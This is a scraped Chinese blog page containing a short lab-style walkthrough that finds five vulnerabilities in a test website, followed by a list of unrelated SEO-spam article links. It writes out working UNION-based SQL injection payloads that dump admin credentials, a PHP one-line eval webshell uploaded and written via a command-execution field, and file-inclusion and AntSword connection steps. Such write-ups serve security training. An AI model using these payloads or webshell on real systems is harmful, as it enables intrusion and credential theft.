当前位置: 首页 > wzjs >正文

景宁县建设局网站网站标题关键优化

wzjs 2025/8/30 12:18:52
景宁县建设局网站,网站标题关键优化,帝国网站后台认证码错误,logo图片大全简单寻找漏洞 一,我们打开页面 第一个漏洞 xss漏洞 1.在登录页面显示有弹窗 第二个漏洞 sql注入漏洞 1.在输入框的地方输入-1 union select 1,2,3#我们来查看他的回显点 2.查看数据库表名 -1 union select 1,database(),3# 3.查看表名 -1 union select 1,2,group…

寻找漏洞

一,我们打开页面

第一个漏洞

xss漏洞

1.在登录页面显示有弹窗

第二个漏洞

sql注入漏洞

1.在输入框的地方输入-1 union select 1,2,3#我们来查看他的回显点

2.查看数据库表名

-1 union select 1,database(),3#

3.查看表名

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#

4.查看admin中的列名

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#

5.查看账号密码

-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#

6.成功登录进来

第三个漏洞

文件上传漏洞

1.我们登录进去往下滑有个上传文件我们上传一个1.php

<?php @eval($_POST['cmd']);?>

2.用蚁剑连接一下

第四个漏洞

命令执行漏洞

1.页面下方有一个执行框,输入ls查看

2.输入echo '<?php phpinfo();?>' > wff.php 访问wff.php

3.写入一句话木马,访问1.php

echo '<?php @eval($_POST['cmd']);?>' > 1.php

4.蚁剑连接

第五个漏洞

文件包含漏洞

1.在关于页面中发现存在文件包含漏洞

2.通过访问之前写入的wff.php查看,远程文件包含关闭,本地文件可以访问

3.访问1.php

4.蚁剑连接

http://www.dtcms.com/wzjs/544107.html

相关文章:

  • 个人站长做什么类型的网站升级网站服务器
  • 网站建设销售工作职责宿迁论坛
  • 退工在那个网站上做网站社区的建设
  • 网站手机端制作软件北京市市场监督管理局官网
  • 网站备案截图柳城 wordpress
  • 山西建网站做一个公司官网
  • 濮阳建站建设西宁市城东区住房和建设局网站
  • 51这个网站还有吗国外产品设计网站
  • 海外公司网站 国内做备案代做网页
  • 青岛城阳做网站上海seo推广价格
  • 企业网站代维护泉州百度开户
  • 网站建设什么科目浅谈海尔的电子商务网站建设
  • 新版网站上线响水县住房建设局网站
  • 网站介绍视频怎么做的重庆网站建设公司多少钱
  • win7 搭建iss网站wordpress wp_footer()
  • 企业网站 用个人备案如何做网上水果网站系统
  • 响应式网站建站价格网上做任务网站有哪些内容
  • 杭州网站建设网页设计师的工作
  • 门户子网站建设申请模拟ip访问网站
  • 免费的logo网站qq是哪家公司的产品
  • 中国铁路监理建设协会网站网页搜索排名分析
  • 神魔网站建设wordpress浏览统计
  • 某俄文网站网络搭建drc
  • html5网站开发开题报告基于superslide2的wordpress幻灯片
  • 网站可以给pdf做笔记广东网站备案 时间
  • 利川做网站网站制作开发的步骤和方法
  • 大型企业网站设计案例模仿ios系统的html网站
  • 手机网站用什么软件怎么建立一个个人网站
  • 自己做视频网站资源从哪里来摄影网站模板
  • 工程管理毕业设计代做网站网络营销的模式有哪些